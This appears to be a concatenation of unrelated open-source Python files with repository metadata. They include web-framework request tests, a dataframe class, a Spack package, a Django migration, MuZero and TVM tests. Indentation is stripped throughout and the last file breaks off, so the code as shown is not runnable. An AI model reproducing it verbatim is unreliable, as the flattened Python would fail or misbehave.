request.url = URL(new_url)
assert request.url.value == new_url
def test_request_content_type_is_read_from_content():
request = Request("POST", b"/", []).with_content(
MultiPartFormData([FormPart(b"a", b"world"), FormPart(b"b", b"9000")])
)
assert request.content is not None
assert request.content_type() == request.content.type
@pytest.mark.parametrize(
"scope,expected_value",
[
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
"http://127.0.0.1:8000/foo",
),
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
"http://127.0.0.1/foo",
),
(
get_example_scope(
"GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
),
"https://127.0.0.1:44777/foo",
),
(
get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
"https://127.0.0.1/foo",
),
],
)
def test_get_asgi_request_full_url(scope, expected_value):
request = incoming_request(scope, None)
full_url = get_request_url(request)
assert full_url == expected_value
def test_request_pyi():
request = Request("GET", b"/", [(b"cookie", b"foo=aaa")])
request.cookies["foo"] == "aaa"
request.get_cookie("foo") == "aaa"
request.get_first_header(b"cookie") == b"foo=aaa"
request.set_cookie("lorem", "ipsum")
request.get_cookie("lorem") == "ipsum"
@pytest.mark.parametrize(
"scope,trailing_slash,expected_value",
[
[
{"scheme": "https", "path": "/", "server": ("www.neoteroi.dev", 443)},
False,
"https://www.neoteroi.dev/",
],
[
{"scheme": "https", "path": "/admin", "server": ("www.neoteroi.dev", 443)},
False,
"https://www.neoteroi.dev/admin",
],
[
{"scheme": "https", "path": "/admin", "server": ("www.neoteroi.dev", 443)},
True,
"https://www.neoteroi.dev/admin/",
],
[
{
"scheme": "https",
"path": "/admin",
"server": ("www.neoteroi.dev", 44777),
},
True,
"https://www.neoteroi.dev:44777/admin/",
],
[
{"scheme": "http", "path": "/admin", "server": ("www.neoteroi.dev", 44777)},
True,
"http://www.neoteroi.dev:44777/admin/",
],
[
{"scheme": "http", "path": "/admin", "server": ("www.neoteroi.dev", 80)},
True,
"http://www.neoteroi.dev/admin/",
],
[
{
"scheme": "http",
"path": "/admin",
"server": ("www.neoteroi.dev", 80),
"query_string": b"foo=Hello%20World%20%C3%B8",
},
False,
"http://www.neoteroi.dev/admin?foo=Hello%20World%20%C3%B8",
],
],
)
def test_get_request_url_from_scope(scope, trailing_slash, expected_value):
result = get_request_url_from_scope(scope, trailing_slash=trailing_slash)
assert result == expected_value
def test_get_request_url_from_scope_raises_for_invalid_scope():
with pytest.raises(ValueError):
get_request_url_from_scope({})
@pytest.mark.parametrize(
"scope,expected_value",
[
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
"http://127.0.0.1:8000/foo",
),
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
"http://127.0.0.1/foo",
),
(
get_example_scope(
"GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
),
"https://127.0.0.1:44777/foo",
),
(
get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
"https://127.0.0.1/foo",
),
],
)
def test_get_request_absolute_url(scope, expected_value):
request = incoming_request(scope)
assert request.scheme == scope["scheme"]
assert request.host == dict(scope["headers"])[b"host"].decode()
assert request.base_path == ""
absolute_url = get_request_absolute_url(request)
assert str(absolute_url) == f"{request.scheme}://{request.host}{request.path}"
assert str(absolute_url) == expected_value
@pytest.mark.parametrize(
"scope,base_path,expected_value",
[
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
"/api",
"http://127.0.0.1:8000/api/foo",
),
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
"/api/",
"http://127.0.0.1/api/foo",
),
(
get_example_scope(
"GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
),
"/api/oof",
"https://127.0.0.1:44777/api/oof/foo",
),
(
get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
"/api/oof/",
"https://127.0.0.1/api/oof/foo",
),
],
)
def test_get_request_absolute_url_with_base_path(scope, base_path, expected_value):
request = incoming_request(scope)
assert request.scheme == scope["scheme"]
assert request.host == dict(scope["headers"])[b"host"].decode()
request.base_path = base_path
absolute_url = get_request_absolute_url(request)
assert str(absolute_url) == expected_value
@pytest.mark.parametrize(
"scope,path,expected_result",
[
(
get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
"/sign-in",
"http://127.0.0.1:8000/sign-in",
),
(
get_example_scope("GET", "/", scheme="http", server=["127.0.0.1", 8000]),
"/authorization/callback",
"http://127.0.0.1:8000/authorization/callback",
),
(
get_example_scope(
"GET", "/a/b/c/", scheme="http", server=["127.0.0.1", 8000]
),
"/authorization/callback",
"http://127.0.0.1:8000/authorization/callback",
),
],
)
def test_get_request_absolute_url_to_path(scope, path, expected_result):
request = incoming_request(scope)
url_to = get_absolute_url_to_path(request, path)
assert str(url_to) == expected_result
def test_can_set_request_host_and_scheme():
scope = get_example_scope(
"GET", "/blacksheep/", scheme="http", server=["127.0.0.1", 80]
)
request = incoming_request(scope)
request.scheme = "https"
request.host = "neoteroi.dev"
absolute_url = get_request_absolute_url(request)
assert str(absolute_url) == "https://neoteroi.dev/blacksheep/"
def test_can_set_request_client_ip():
scope = get_example_scope(
"GET", "/blacksheep/", scheme="http", server=["127.0.0.1", 80]
)
request = incoming_request(scope)
request.client_ip == scope["client"][0]
assert request.original_client_ip == "127.0.0.1"
# can set (e.g. when handling forwarded headers)
request.original_client_ip = "192.168.127.12"
assert request.original_client_ip == "192.168.127.12"
assert scope["client"] == ("127.0.0.1", 51492)
|
subjects/hello/hello.py
|
powerdev0510/pythonc
| 405 |
69689
|
<filename>subjects/hello/hello.py
# Some code below
def hello():
print "Hello World"
|
towhee/dataframe/dataframe_v2.py
|
L-Net-1992/towhee
| 365 |
69700
|
<filename>towhee/dataframe/dataframe_v2.py
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from typing import Iterable, List, Tuple, Any
from towhee.dataframe.array import Array
class DataFrame:
"""
A `DataFrame` is a collection of immutable, potentially heterogeneous blogs of data.
Args:
name (`str`):
Name of the dataframe; `DataFrame` names should be the same as its
representation.
data (`list[towhee.Array]` or `list[Tuple]` or `dict[str, towhee.Array]`):
The data of the `DataFrame`. Internally, the data will be organized
in a column-based manner.
"""
def __init__(
self,
name: str = None,
data=None,
columns=None,
):
self._name = name
self._len = 0
self._sealed = False
self._lock = threading.Lock()
# For `data` is empty
if not data:
pass
# For `data` is `list`
elif isinstance(data, list):
container_types = set(type(i) for i in data)
if len(container_types) != 1:
raise ValueError(
'can not construct Dataframe from a list of hybrid data containers. Try list[Tuple] or list[Array].')
container_type = container_types.pop()
# For `data` is `list[tuple]`
if container_type is tuple:
self._from_tuples(data, columns)
# For `data` is `list[towhee.Array]`
elif container_type is Array:
self._from_arrays(data, columns)
else:
raise ValueError('can not construct DataFrame from list[%s]' % (container_type))
# For `data` is `dict`
elif isinstance(data, dict):
self._from_dict(data)
# Unrecognized data types
else:
raise ValueError('can not construct DataFrame from data type %s' % (type(data)))
def __getitem__(self, key):
# access a row
if isinstance(key, int):
return tuple(self._data_as_list[i][key] for i in range(len(self._data_as_list)))
# access a column
elif isinstance(key, str):
return self._data_as_dict[key]
def __len__(self):
return self._len
@property
def name(self) -> str:
return self._name
@property
def data(self) -> List[Array]:
return self._data_as_list
def iter(self) -> Iterable[Tuple[Any, ...]]:
"""
Iterate over DataFrame rows as tuples.
"""
return DFIterator(self)
def seal(self):
with self._lock:
self._sealed = True
def is_sealed(self) -> bool:
with self._lock:
return self._sealed
def _from_tuples(self, data, columns):
# check tuple length
tuple_lengths = set(len(i) for i in data)
if len(tuple_lengths) == 1:
tuple_length = tuple_lengths.pop()
else:
raise ValueError('can not construct DataFrame from unequal-length tuples')
# check columns length
if columns and len(columns) != tuple_length:
raise ValueError('length of columns is not equal to the length of tuple')
# create arrays
if columns:
self._data_as_list = [Array(name=columns[i]) for i in range(tuple_length)]
self._data_as_dict = {columns[i]: self._data_as_list[i] for i in range(tuple_length)}
else:
self._data_as_list = [Array()] * tuple_length
self._data_as_dict = None
# tuples to arrays
for row in data:
for i, element in enumerate(row):
self._data_as_list[i].put(element)
self._len = len(data)
def _from_arrays(self, data, columns):
# check array length
array_lengths = set(len(array) for array in data)
if len(array_lengths) != 1:
raise ValueError('arrays in data should have equal length')
self._len = array_lengths.pop()
# check columns length
if columns and len(columns) != len(data):
raise ValueError('length of columns is not equal to the number of arrays')
self._data_as_list = data
if columns:
self._data_as_dict = {columns[i]: self._data_as_list[i] for i in range(len(data))}
else:
self._data_as_dict = None
def _from_dict(self, data):
# check dict values
for value in data.values():
if not isinstance(value, Array):
raise ValueError('value type in data should be towhee.Array')
# check arrays length
array_lengths = set(len(array) for array in data.values())
if len(array_lengths) != 1:
raise ValueError('arrays in data should have equal length')
self._len = array_lengths.pop()
self._data_as_list = list(data.values())
self._data_as_dict = data
class DFIterator:
"""
A row-based `DataFrame` iterator.
"""
def __init__(self, df: DataFrame):
self._df = df
self._offset = 0
def __iter__(self):
return self
def __next__(self):
"""
Returns:
(`Tuple[Any, ...]`)
In the normal case, the iterator will return a `Tuple` at each call.
(`None`)
In the case that the `DataFrame` is not sealed and the new rows are
not ready yet, the iterator will return `None`. The caller should
determine whether to block the iteration or exit the loop.
Raises:
(`StopIteration`)
The iteration end iff the `DataFrame` is sealed and the last row is
reached.
"""
if len(self._df) == self._offset:
if self._df.is_sealed():
# Already reach the last row
raise StopIteration
else:
# No more ready rows
return None
else:
row = self._df[self._offset]
self._offset += 1
return row
def ack(self):
"""
To notice the DataFrame that the iterated rows has been successfully processed.
An acknowledgement (ack) will notice the `DataFrame`s that the rows already
iterated over are no longer used, and can be deleted from the system.
"""
pass
|
rpython/jit/backend/aarch64/test/test_list.py
|
nanjekyejoannah/pypy
| 333 |
69704
|
<reponame>nanjekyejoannah/pypy
from rpython.jit.metainterp.test.test_list import ListTests
from rpython.jit.backend.aarch64.test.test_basic import JitAarch64Mixin
class TestList(JitAarch64Mixin, ListTests):
# for individual tests see
# ====> ../../../metainterp/test/test_list.py
pass
|
var/spack/repos/builtin/packages/pacparser/package.py
|
LiamBindle/spack
| 2,360 |
69716
|
<gh_stars>1000+
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Pacparser(MakefilePackage):
"""pacparser is a library to parse proxy auto-config (PAC) files."""
homepage = "https://pacparser.github.io/"
url = "https://github.com/manugarg/pacparser/releases/download/1.3.7/pacparser-1.3.7.tar.gz"
version('1.3.7', sha256='eb48ec2fc202d12a4b882133048c7590329849f32c2285bc4dbe418f29aad249')
depends_on('python', when='+python')
depends_on('py-setuptools', when='+python', type=('build', 'run'))
variant('python', default=False,
description='Build and install python bindings')
def build(self, spec, prefix):
make('-C', 'src')
if '+python' in spec:
make('-C', 'src', 'pymod')
def install(self, spec, prefix):
make('-C', 'src', 'install', 'PREFIX=' + self.prefix)
if '+python' in spec:
make('-C', 'src', 'install-pymod', 'PREFIX=' + self.prefix,
'EXTRA_ARGS=--prefix={0}'.format(prefix))
|
recipes/Python/252178_Reorder_sequence_uses_generators/recipe-252178.py
|
tdiprima/code
| 2,023 |
69733
|
<reponame>tdiprima/code<gh_stars>1000+
def all_perms(str):
if len(str) <=1:
yield str
else:
for perm in all_perms(str[1:]):
for i in range(len(perm)+1):
#nb str[0:1] works in both string and list contexts
yield perm[:i] + str[0:1] + perm[i:]
|
src/chia_log/log_handler.py
|
Connor-Knabe/chiadog
| 503 |
69749
|
<gh_stars>100-1000
# std
from typing import Optional
# project
from src.chia_log.handlers.daily_stats.stats_manager import StatsManager
from src.chia_log.handlers.harvester_activity_handler import HarvesterActivityHandler
from src.chia_log.handlers.partial_handler import PartialHandler
from src.chia_log.handlers.block_handler import BlockHandler
from src.chia_log.handlers.finished_signage_point_handler import FinishedSignagePointHandler
from src.chia_log.handlers.wallet_added_coin_handler import WalletAddedCoinHandler
from src.chia_log.log_consumer import LogConsumerSubscriber, LogConsumer
from src.notifier.notify_manager import NotifyManager
class LogHandler(LogConsumerSubscriber):
"""This class holds a list of handlers that analyze
specific parts of the logs and generate events that
are consumed by the notifier (for user notifications).
Data flow:
LogConsumer -> LogHandler -> Notifier
Three easy steps to extend monitoring functionality
1. Create a parser for a new part of the log stream
2. Create a handler for analysing the parsed information
3. Add the new handler to the list of handlers below
"""
def __init__(
self, log_consumer: LogConsumer, notify_manager: NotifyManager, stats_manager: Optional[StatsManager] = None
):
self._notify_manager = notify_manager
self._stats_manager = stats_manager
self._handlers = [
HarvesterActivityHandler(),
PartialHandler(),
BlockHandler(),
FinishedSignagePointHandler(),
WalletAddedCoinHandler(),
]
log_consumer.subscribe(self)
def consume_logs(self, logs: str):
for handler in self._handlers:
events = handler.handle(logs, self._stats_manager)
self._notify_manager.process_events(events)
|
muzero/core_test.py
|
xxdreck/google-research
| 23,901 |
69766
|
<reponame>xxdreck/google-research<filename>muzero/core_test.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for muzero.core."""
import tensorflow as tf
from muzero import core
class CoreTest(tf.test.TestCase):
def test_make_target(self):
num_unroll_steps = 3
td_steps = -1
rewards = [1., 2., 3., 4.]
# Assume 4 different actions.
policy_distributions = [
[0.7, 0.1, 0.1, 0.1],
[0.1, 0.7, 0.1, 0.1],
[0.1, 0.1, 0.7, 0.1],
[0.1, 0.1, 0.1, 0.7],
]
discount = 0.9
target = core.Episode.make_target(
state_index=0,
num_unroll_steps=num_unroll_steps,
td_steps=td_steps,
rewards=rewards,
policy_distributions=policy_distributions,
discount=discount)
self.assertEqual(core.Target(
value_mask=(1., 1., 1., 1.),
reward_mask=(0., 1., 1., 1.),
policy_mask=(1., 1., 1., 1.),
value=(rewards[0] + rewards[1] * discount \
+ rewards[2] * discount**2 + rewards[3] * discount**3,
rewards[1] + rewards[2] * discount + rewards[3] * discount**2,
rewards[2] + rewards[3] * discount,
rewards[3]),
reward=(rewards[3], rewards[0], rewards[1], rewards[2]),
visits=tuple(policy_distributions)), target)
target = core.Episode.make_target(
state_index=2,
num_unroll_steps=num_unroll_steps,
td_steps=td_steps,
rewards=rewards,
policy_distributions=policy_distributions,
discount=discount)
self.assertEqual(
core.Target(
value_mask=(1., 1., 1., 1.),
reward_mask=(0., 1., 1., 0.),
policy_mask=(1., 1., 0., 0.),
value=(rewards[2] + rewards[3] * discount, rewards[3], 0., 0.),
reward=(rewards[1], rewards[2], rewards[3], 0.),
visits=tuple(policy_distributions[2:] +
[policy_distributions[0]] * 2)), target)
def test_encode_decode(self):
encoder = core.ValueEncoder(
min_value=-2,
max_value=2,
num_steps=5,
use_contractive_mapping=False)
encoded = encoder.encode(tf.constant([-0.5, 0.9, 5.0]))
self.assertAllClose([[0, 0.5, 0.5, 0, 0],
[0, 0, 0.1, 0.9, 0],
[0, 0, 0, 0, 1]], encoded)
self.assertAllClose([-0.5, 0.9, 2.0], encoder.decode(encoded))
encoder = core.ValueEncoder(
min_value=-2,
max_value=2,
num_steps=5,
use_contractive_mapping=True)
encoded = encoder.encode(tf.constant([-0.5, 0.9, 5.0]))
# Scaling transformation with contractive mapping
self.assertAllClose([[0, 0.61, 0.39, 0, 0],
[0, 0, 0, 0.97, 0.03],
[0, 0, 0, 0, 1]], encoded, atol=0.01)
self.assertAllClose([-0.5, 0.9, 2.0], encoder.decode(encoded), atol=0.001)
if __name__ == '__main__':
tf.test.main()
|
mod_pbxproj.py
|
xwf20050250/mod-pbxproj
| 991 |
69770
|
# MIT License
#
# Copyright (c) 2016 <NAME> aka kronenthaler
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This is a backwards-compatibility file. For Unity developers this is the only file it needs to be added to the Unity
# project.
# This file will install the proper python package into the user's python's local space, if it's not present at run-time
# of this script. Afterwards, it will import all necessary modules to the developer to make his/her own script work as
# before.
from setuptools import setup
import site
__author__ = 'kronenthaler'
__version__ = '2.0.1'
__package_name__ = 'mod_pbxproj_installer'
try:
# check if file exists
from pbxproj import XcodeProject
except:
# install it if not present
print('Installing package...')
setup(name=__package_name__,
license='MIT License',
install_requires=['pbxproj'],
script_args=['install', '--user', '--force', '--record', '.uninstall_files'])
# force the refresh of the packages
reload(site)
# import publicly
from pbxproj import *
|
usaspending_api/accounts/migrations/0001_initial.py
|
g4brielvs/usaspending-api
| 217 |
69777
|
<filename>usaspending_api/accounts/migrations/0001_initial.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-10-11 16:17
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
from usaspending_api.common.helpers.generic_helper import FY_PG_FUNCTION_DEF
class Migration(migrations.Migration):
initial = True
dependencies = [
('submissions', '0001_initial'),
('references', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AppropriationAccountBalances',
fields=[
('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
('appropriation_account_balances_id', models.AutoField(primary_key=True, serialize=False)),
('budget_authority_unobligated_balance_brought_forward_fyb', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('adjustments_to_unobligated_balance_brought_forward_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('budget_authority_appropriated_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('borrowing_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('contract_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('spending_authority_from_offsetting_collections_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('other_budgetary_resources_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('total_budgetary_resources_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('gross_outlay_amount_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('deobligations_recoveries_refunds_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('unobligated_balance_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('status_of_budgetary_resources_total_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('obligations_incurred_total_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('drv_appropriation_availability_period_start_date', models.DateField(blank=True, null=True)),
('drv_appropriation_availability_period_end_date', models.DateField(blank=True, null=True)),
('drv_appropriation_account_expired_status', models.TextField(blank=True, null=True)),
('drv_obligations_unpaid_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('drv_other_obligated_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('reporting_period_start', models.DateField(blank=True, null=True)),
('reporting_period_end', models.DateField(blank=True, null=True)),
('last_modified_date', models.DateField(blank=True, null=True)),
('certified_date', models.DateField(blank=True, null=True)),
('create_date', models.DateTimeField(auto_now_add=True, null=True)),
('update_date', models.DateTimeField(auto_now=True, null=True)),
('final_of_fy', models.BooleanField(db_index=True, default=False)),
('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='submissions.SubmissionAttributes')),
],
options={
'db_table': 'appropriation_account_balances',
'managed': True,
},
),
migrations.CreateModel(
name='AppropriationAccountBalancesQuarterly',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
('budget_authority_unobligated_balance_brought_forward_fyb', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('adjustments_to_unobligated_balance_brought_forward_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('budget_authority_appropriated_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('borrowing_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('contract_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('spending_authority_from_offsetting_collections_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('other_budgetary_resources_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
('total_budgetary_resources_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('gross_outlay_amount_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('deobligations_recoveries_refunds_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('unobligated_balance_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('status_of_budgetary_resources_total_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('obligations_incurred_total_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
('create_date', models.DateTimeField(auto_now_add=True, null=True)),
('update_date', models.DateTimeField(auto_now=True, null=True)),
('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='submissions.SubmissionAttributes')),
],
options={
'db_table': 'appropriation_account_balances_quarterly',
'managed': True,
},
),
migrations.CreateModel(
name='BudgetAuthority',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('agency_identifier', models.TextField(db_index=True)),
('fr_entity_code', models.TextField(db_index=True, null=True)),
('year', models.IntegerField()),
('amount', models.BigIntegerField(null=True)),
],
options={
'db_table': 'budget_authority',
},
),
migrations.CreateModel(
name='FederalAccount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('agency_identifier', models.TextField(db_index=True)),
('main_account_code', models.TextField(db_index=True)),
('account_title', models.TextField()),
('federal_account_code', models.TextField(null=True)),
],
options={
'db_table': 'federal_account',
'managed': True,
},
),
migrations.CreateModel(
name='TreasuryAppropriationAccount',
fields=[
('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
('treasury_account_identifier', models.AutoField(primary_key=True, serialize=False)),
('tas_rendering_label', models.TextField(blank=True, null=True)),
('allocation_transfer_agency_id', models.TextField(blank=True, null=True)),
('agency_id', models.TextField()),
('beginning_period_of_availability', models.TextField(blank=True, null=True)),
('ending_period_of_availability', models.TextField(blank=True, null=True)),
('availability_type_code', models.TextField(blank=True, null=True)),
('availability_type_code_description', models.TextField(blank=True, null=True)),
('main_account_code', models.TextField()),
('sub_account_code', models.TextField()),
('account_title', models.TextField(blank=True, null=True)),
('reporting_agency_id', models.TextField(blank=True, null=True)),
('reporting_agency_name', models.TextField(blank=True, null=True)),
('budget_bureau_code', models.TextField(blank=True, null=True)),
('budget_bureau_name', models.TextField(blank=True, null=True)),
('fr_entity_code', models.TextField(blank=True, null=True)),
('fr_entity_description', models.TextField(blank=True, null=True)),
('budget_function_code', models.TextField(blank=True, null=True)),
('budget_function_title', models.TextField(blank=True, null=True)),
('budget_subfunction_code', models.TextField(blank=True, null=True)),
('budget_subfunction_title', models.TextField(blank=True, null=True)),
('drv_appropriation_availability_period_start_date', models.DateField(blank=True, null=True)),
('drv_appropriation_availability_period_end_date', models.DateField(blank=True, null=True)),
('drv_appropriation_account_expired_status', models.TextField(blank=True, null=True)),
('create_date', models.DateTimeField(auto_now_add=True, null=True)),
('update_date', models.DateTimeField(auto_now=True, null=True)),
('internal_start_date', models.DateField(blank=True, null=True)),
('internal_end_date', models.DateField(blank=True, null=True)),
('awarding_toptier_agency', models.ForeignKey(help_text='The toptier agency object associated with the ATA', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='tas_ata', to='references.ToptierAgency')),
('federal_account', models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.FederalAccount')),
('funding_toptier_agency', models.ForeignKey(help_text='The toptier agency object associated with the AID', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='tas_aid', to='references.ToptierAgency')),
],
options={
'db_table': 'treasury_appropriation_account',
'managed': True,
},
),
migrations.AlterUniqueTogether(
name='federalaccount',
unique_together=set([('agency_identifier', 'main_account_code')]),
),
migrations.AlterUniqueTogether(
name='budgetauthority',
unique_together=set([('agency_identifier', 'fr_entity_code', 'year')]),
),
migrations.AddField(
model_name='appropriationaccountbalancesquarterly',
name='treasury_account_identifier',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accounts.TreasuryAppropriationAccount'),
),
migrations.AddField(
model_name='appropriationaccountbalances',
name='treasury_account_identifier',
field=models.ForeignKey(db_column='treasury_account_identifier', on_delete=django.db.models.deletion.CASCADE, related_name='account_balances', to='accounts.TreasuryAppropriationAccount'),
),
migrations.RunSQL(sql=[FY_PG_FUNCTION_DEF]),
]
|
coapthon/resources/remoteResource.py
|
urbas/CoAPthon3
| 237 |
69793
|
<reponame>urbas/CoAPthon3
from coapthon.resources.resource import Resource
__author__ = '<NAME>'
class RemoteResource(Resource):
def __init__(self, name, remote_server, remote_path, coap_server=None, visible=True, observable=True, allow_children=True):
super(RemoteResource, self).__init__(name, coap_server, visible=visible, observable=observable,
allow_children=allow_children)
self.remote_path = remote_path
self.remote_server = remote_server
|
tests/python/unittest/test_pass_vectorize.py
|
mingwayzhang/tvm
| 286 |
69820
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
def test_vectorize_loop():
dtype = 'int64'
n = tvm.var('n')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, n) as i:
with ib.for_range(0, 4, for_type="vectorize") as j:
A[j] = tvm.const(1, A.dtype)
stmt = ib.get()
assert isinstance(stmt.body, tvm.stmt.For)
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
assert not isinstance(stmt.body, tvm.stmt.For)
assert isinstance(stmt.body.index, tvm.expr.Ramp)
assert isinstance(stmt.body.value, tvm.expr.Broadcast)
def test_vectorize_vector():
dtype = 'int64'
n = tvm.var('n')
ib = tvm.ir_builder.create()
A = ib.pointer("float32x4", name="A")
with ib.for_range(0, n) as i:
with ib.for_range(0, 4, for_type="vectorize") as j:
A[j] = tvm.const(1, A.dtype)
stmt = ib.get()
assert isinstance(stmt.body, tvm.stmt.For)
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.For)
assert not isinstance(stmt.body, tvm.stmt.For)
assert isinstance(stmt.body.index, tvm.expr.Ramp)
assert isinstance(stmt.body.value, tvm.expr.Broadcast)
def test_vectorize_with_if():
n = tvm.var('n')
x = tvm.var('x')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, 4, for_type="vectorize") as i:
with ib.if_scope(x < n):
A[i] = A[i] + 1
with ib.else_scope():
with ib.if_scope(i < n):
A[i] = 2.0
stmt = ib.get()
stmt = tvm.ir_pass.VectorizeLoop(stmt)
assert isinstance(stmt, tvm.stmt.IfThenElse)
assert isinstance(stmt.then_case.index, tvm.expr.Ramp)
assert isinstance(stmt.then_case.value, tvm.expr.Add)
assert stmt.then_case.value.dtype == "float32x4"
assert isinstance(stmt.else_case, tvm.stmt.For)
def test_vectorize_with_le_cond():
n = tvm.var('n')
ib = tvm.ir_builder.create()
A = ib.pointer("float32", name="A")
with ib.for_range(0, 4, for_type="vectorize") as i:
with ib.if_scope(i <= n):
A[i] = A[i] + 1
stmt = ib.get()
